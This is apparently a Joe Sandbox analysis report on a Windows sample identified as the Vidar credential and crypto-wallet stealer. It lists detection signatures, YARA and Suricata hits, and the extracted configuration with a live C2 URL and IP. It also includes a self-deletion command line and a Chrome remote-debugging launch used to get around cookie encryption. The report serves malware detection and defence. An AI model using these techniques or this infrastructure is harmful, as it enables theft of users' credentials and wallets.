Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ngbtiladkrthgad.exe

Overview

General Information

Sample name:ngbtiladkrthgad.exe
Analysis ID:1637340
MD5:20beeeadd1cfac0bb5bda17172f1359f
SHA1:fa2ca39b5e4f273d6017cb731086ce0e81af221c
SHA256:c008a013fe6de93e4e83f0ce98098130fc16cecbf15c5e15438a8ccc47ceec69
Tags:exeuser-TornadoAV_dev
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ngbtiladkrthgad.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\ngbtiladkrthgad.exe" MD5: 20BEEEADD1CFAC0BB5BDA17172F1359F)
    • chrome.exe (PID: 8088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 5228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1892,i,7460351053640162327,6554442286005526848,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2444 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • cmd.exe (PID: 2564 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\o89zu" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 1208 cmdline: timeout /t 11 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199832267488", "Botnet": "dqu220"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ngbtiladkrthgad.exeinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
  • 0x1e2ca:$str01: MachineID:
  • 0x1d553:$str02: Work Dir: In memory
  • 0x1e301:$str03: [Hardware]
  • 0x1e2b3:$str04: VideoCard:
  • 0x1dcb5:$str05: [Processes]
  • 0x1dcc1:$str06: [Software]
  • 0x1d5d0:$str07: information.txt
  • 0x1e036:$str08: %s\*
  • 0x1e083:$str08: %s\*
  • 0x1d806:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
  • 0x1db9f:$str12: UseMasterPassword
  • 0x1e30d:$str13: Soft: WinSCP
  • 0x1ddeb:$str14: <Pass encoding="base64">
  • 0x1e2f0:$str15: Soft: FileZilla
  • 0x1d5c2:$str16: passwords.txt
  • 0x1dbca:$str17: build_id
  • 0x1dc79:$str18: file_data

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: ngbtiladkrthgad.exe PID: 7304JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        Process Memory Space: ngbtiladkrthgad.exe PID: 7304JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.ngbtiladkrthgad.exe.400000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x1e2ca:$str01: MachineID:
          • 0x1d553:$str02: Work Dir: In memory
          • 0x1e301:$str03: [Hardware]
          • 0x1e2b3:$str04: VideoCard:
          • 0x1dcb5:$str05: [Processes]
          • 0x1dcc1:$str06: [Software]
          • 0x1d5d0:$str07: information.txt
          • 0x1e036:$str08: %s\*
          • 0x1e083:$str08: %s\*
          • 0x1d806:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x1db9f:$str12: UseMasterPassword
          • 0x1e30d:$str13: Soft: WinSCP
          • 0x1ddeb:$str14: <Pass encoding="base64">
          • 0x1e2f0:$str15: Soft: FileZilla
          • 0x1d5c2:$str16: passwords.txt
          • 0x1dbca:$str17: build_id
          • 0x1dc79:$str18: file_data
          0.2.ngbtiladkrthgad.exe.400000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x1e2ca:$str01: MachineID:
          • 0x1d553:$str02: Work Dir: In memory
          • 0x1e301:$str03: [Hardware]
          • 0x1e2b3:$str04: VideoCard:
          • 0x1dcb5:$str05: [Processes]
          • 0x1dcc1:$str06: [Software]
          • 0x1d5d0:$str07: information.txt
          • 0x1e036:$str08: %s\*
          • 0x1e083:$str08: %s\*
          • 0x1d806:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x1db9f:$str12: UseMasterPassword
          • 0x1e30d:$str13: Soft: WinSCP
          • 0x1ddeb:$str14: <Pass encoding="base64">
          • 0x1e2f0:$str15: Soft: FileZilla
          • 0x1d5c2:$str16: passwords.txt
          • 0x1dbca:$str17: build_id
          • 0x1dc79:$str18: file_data

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Browser Started with Remote Debugging
          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\ngbtiladkrthgad.exe", ParentImage: C:\Users\user\Desktop\ngbtiladkrthgad.exe, ParentProcessId: 7304, ParentProcessName: ngbtiladkrthgad.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8088, ProcessName: chrome.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T14:49:57.326064+010020442471Malware Command and Control Activity Detected78.47.63.132443192.168.2.449728TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T14:49:59.682778+010020518311Malware Command and Control Activity Detected78.47.63.132443192.168.2.449729TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T14:49:57.325793+010020490871A Network Trojan was detected192.168.2.44972878.47.63.132443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T14:50:02.032048+010020593311Malware Command and Control Activity Detected192.168.2.44973278.47.63.132443TCP
          2025-03-13T14:50:03.389862+010020593311Malware Command and Control Activity Detected192.168.2.44973378.47.63.132443TCP
          2025-03-13T14:50:03.824037+010020593311Malware Command and Control Activity Detected192.168.2.44973478.47.63.132443TCP
          2025-03-13T14:50:05.735487+010020593311Malware Command and Control Activity Detected192.168.2.44973578.47.63.132443TCP
          2025-03-13T14:50:07.701305+010020593311Malware Command and Control Activity Detected192.168.2.44973678.47.63.132443TCP
          2025-03-13T14:50:16.979454+010020593311Malware Command and Control Activity Detected192.168.2.44976078.47.63.132443TCP
          2025-03-13T14:50:18.109277+010020593311Malware Command and Control Activity Detected192.168.2.44976378.47.63.132443TCP
          2025-03-13T14:50:19.051913+010020593311Malware Command and Control Activity Detected192.168.2.44976478.47.63.132443TCP
          2025-03-13T14:50:20.128435+010020593311Malware Command and Control Activity Detected192.168.2.44976578.47.63.132443TCP
          2025-03-13T14:50:22.104272+010020593311Malware Command and Control Activity Detected192.168.2.44976678.47.63.132443TCP
          2025-03-13T14:50:23.257529+010020593311Malware Command and Control Activity Detected192.168.2.44976778.47.63.132443TCP
          2025-03-13T14:50:25.902180+010020593311Malware Command and Control Activity Detected192.168.2.44976878.47.63.132443TCP
          2025-03-13T14:50:28.375443+010020593311Malware Command and Control Activity Detected192.168.2.44976978.47.63.132443TCP
          2025-03-13T14:50:40.633735+010020593311Malware Command and Control Activity Detected192.168.2.44977278.47.63.132443TCP
          2025-03-13T14:50:43.223167+010020593311Malware Command and Control Activity Detected192.168.2.44977478.47.63.132443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T14:50:03.824037+010028596361Malware Command and Control Activity Detected192.168.2.44973478.47.63.132443TCP
          2025-03-13T14:50:05.735487+010028596361Malware Command and Control Activity Detected192.168.2.44973578.47.63.132443TCP
          2025-03-13T14:50:07.701305+010028596361Malware Command and Control Activity Detected192.168.2.44973678.47.63.132443TCP
          2025-03-13T14:50:19.051913+010028596361Malware Command and Control Activity Detected192.168.2.44976478.47.63.132443TCP
          2025-03-13T14:50:20.128435+010028596361Malware Command and Control Activity Detected192.168.2.44976578.47.63.132443TCP
          2025-03-13T14:50:22.104272+010028596361Malware Command and Control Activity Detected192.168.2.44976678.47.63.132443TCP
          2025-03-13T14:50:23.257529+010028596361Malware Command and Control Activity Detected192.168.2.44976778.47.63.132443TCP
          2025-03-13T14:50:25.902180+010028596361Malware Command and Control Activity Detected192.168.2.44976878.47.63.132443TCP
          2025-03-13T14:50:28.375443+010028596361Malware Command and Control Activity Detected192.168.2.44976978.47.63.132443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T14:49:52.411851+010028593781Malware Command and Control Activity Detected192.168.2.44972378.47.63.132443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: ngbtiladkrthgad.exeAvira: detected
          Found malware configuration
          Source: ngbtiladkrthgad.exeMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199832267488", "Botnet": "dqu220"}
          Multi AV Scanner detection for submitted file
          Source: ngbtiladkrthgad.exeVirustotal: Detection: 75%Perma Link
          Source: ngbtiladkrthgad.exeReversingLabs: Detection: 71%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00406A10 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,0_2_00406A10
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00410830 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,0_2_00410830
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040A150 BCryptCloseAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,0_2_0040A150
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00406CF0 LocalAlloc,BCryptDecrypt,0_2_00406CF0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00406940 BCryptCloseAlgorithmProvider,BCryptDestroyKey,0_2_00406940
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040A560 StrCmpCA,BCryptCloseAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptDestroyKey,0_2_0040A560
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00406980 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,BCryptCloseAlgorithmProvider,BCryptDestroyKey,0_2_00406980
          Source: ngbtiladkrthgad.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49776 version: TLS 1.2
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00414E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,0_2_00414E70
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00407210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,0_2_00407210
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose,0_2_0040B6B0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00415EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_00415EB0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00408360 FindFirstFileA,CopyFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindClose,0_2_00408360
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00413FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,0_2_00413FD0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004013F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose,0_2_004013F0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00413580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindClose,0_2_00413580
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004097B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,0_2_004097B0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040ACD0 wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,lstrlenA,DeleteFileA,CopyFileA,FindClose,0_2_0040ACD0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00408C90 lstrcpyA,lstrcatA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,FindClose,DeleteFileA,_invalid_parameter_noinfo_noreturn,0_2_00408C90
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00414950 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414950
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00409560 ??2@YAPAXI@Z,??2@YAPAXI@Z,_invalid_parameter_noinfo_noreturn,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,0_2_00409560
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00413AF0 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413AF0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: chrome.exeMemory has grown: Private usage: 0MB later: 39MB

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49728 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49732 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49723 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49733 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49734 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49734 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49763 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49735 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49735 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 78.47.63.132:443 -> 192.168.2.4:49729
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49765 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49765 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 78.47.63.132:443 -> 192.168.2.4:49728
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49766 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49766 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49736 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49736 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49764 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49764 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49767 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49767 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49768 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49768 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49769 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49769 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49760 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49772 -> 78.47.63.132:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49774 -> 78.47.63.132:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199832267488
          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 1.1.1.1:53
          Source: global trafficHTTP traffic detected: GET /g_etcontent HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
